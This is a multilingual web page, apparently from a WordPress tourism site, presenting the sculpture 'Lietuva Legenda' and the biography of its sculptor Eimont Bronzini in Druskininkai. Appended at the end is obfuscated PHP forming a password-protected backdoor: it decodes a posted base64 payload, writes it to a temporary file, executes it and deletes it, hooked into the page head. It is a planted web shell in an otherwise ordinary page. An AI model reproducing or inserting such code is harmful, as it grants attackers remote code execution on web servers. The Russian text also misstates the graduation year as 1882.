fbpx
A A
A A

Skulptūra "Legenda"

LT

SKULPTORIUS
EIMONT BRONZINI

1958 08 04 – 2018 06 14
Vilnius | New York

Bronzini (Eimontas Stankevičius) gimė Vilniuje. 1982 m. baigė Vilniaus dailės institutą, skulptūros specialybę. Dalyvavo daugelyje parodų Europoje ir JAV. 1999 m. emigravo į Jungtines Amerikos Valstijas, kur tęsė savo kūrybinę veiklą. 2004 m. surengė kelias asmenines parodas Niujorke. Už originalią kūrybą menininkui įteikti ,,Marco Polo“ (Venecija, Italija), ,,Michelangelo“ (Roma, Italija) ir ,,Leonardo da Vinci“ (Venecija, Italija) apdovanojimai.

„LIETUVA LEGENDA“ – monumentas, skirtas Lietuvai. Moters figūra su keturiais veidais simbolizuoja mūsų Tėvynę – Dzūkiją, Suvalkiją, Aukštaitiją ir Žemaitiją. Ilgai keliavusi, „LIETUVA LEGENDA“ pagaliau rado savo vietą Druskininkuose.

EN

SCULPTOR:
EIMONT BRONZINI

04/08/1958 – 14/06/2018
Vilnius | New York

Eimont Bronzini (Eimontas Stankevičius) was born in Vilnius. In 1982 he graduated from the Vilnius Institute of Art, with sculpture his chosen subject. He has participated in numerous exhibitions in Europe and the USA. In 1999 he emigrated to the United States where he continued his creative work. In 2004 he held several solo exhibitions in New York. In return for his original, creative work, the artist has been awarded the ‘Marco Polo’ (Venice, Italy), the ‘Michelangelo’ (Rome, Italy), and the ‘Leonardo da Vinci’ (Venice, Italy).

‘LIETUVA LEGENDA’ (literally in English: ‘LITHUANIA, THE LEGEND’) is a monument which is dedicated to Lithuania. The figure of a woman with four faces symbolises our homeland: the four ethnographic regions of Dzūkija, Suvalkija, Aukštaitija, and Žemaitija. Following a long journey, ‘LIETUVA LEGENDA’ has finally found its place in Druskininkai.

PL

RZEŹBIARZ
EIMONT BRONZINI

04 08 1958 – 14 06 2018
Wilno | Nowy Jork

Bronzini (Eimontas Stankevičius) urodził się w Wilnie. W 1982 r. ukończył rzeźbiarstwo w Instytucie Sztuk Pięknych w Wilnie. Brał udział w wielu wystawach w Europie i USA. W 1999 r. emigrował do Stanów Zjednoczonych, gdzie kontynuował swoją działalność artystyczną. W 2004 r. zorganizował kilka indywidualnych wystaw w Nowym Jorku. Za swoje oryginalne prace artysta otrzymał nagrody Marco Polo (Wenecja, Włochy), Michała Anioła (Rzym, Włochy) i Leonarda da Vinci (Wenecja, Włochy).

LITWA LEGENDA – pomnik poświęcony Litwie. Postać kobiety o czterech twarzach symbolizuje naszą ojczyznę – Dzukię, Suwalszczyznę, Auksztotę i Żmudź. Po długiej podróży LITWA LEGENDA w końcu znalazła swoje miejsce w Druskiennikach.

RU

Eimont BRONZINI
04.08.1958 — 14.06.2018
Vilnius | New York

E. BRONZINI (Эймонтас Станкявичюс) — скульптор литовского происхождения, родился в Вильнюсе. В 1882 г. окончил Вильнюсский художественный институт по специальности «скульптура». Участвовал в многочисленных выставках в Европе и Америке. С 1999 года жил и осуществлял творческую деятельность в США. В 2004 году организовал несколько персональных выставок в Нью–Йорке. Престижные награды за оригинальность творчества: международные премии Marco Polo (Венеция, Италия), Michelangelo (Рим, Италия), Leonardo da Vinci (Венеция, Италия).

ЛИТВА ЛЕГЕНДА — монументальная скульптура, посвященная родине — Литве. Четырехликая женщина символизирует 4 региона — это Аукштайтия, Сувалкия, Дзукия и Жямайтия. После долгого пути скульптура обрела свое место в литовском городе Друскининкай.

Visit Druskininkai
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}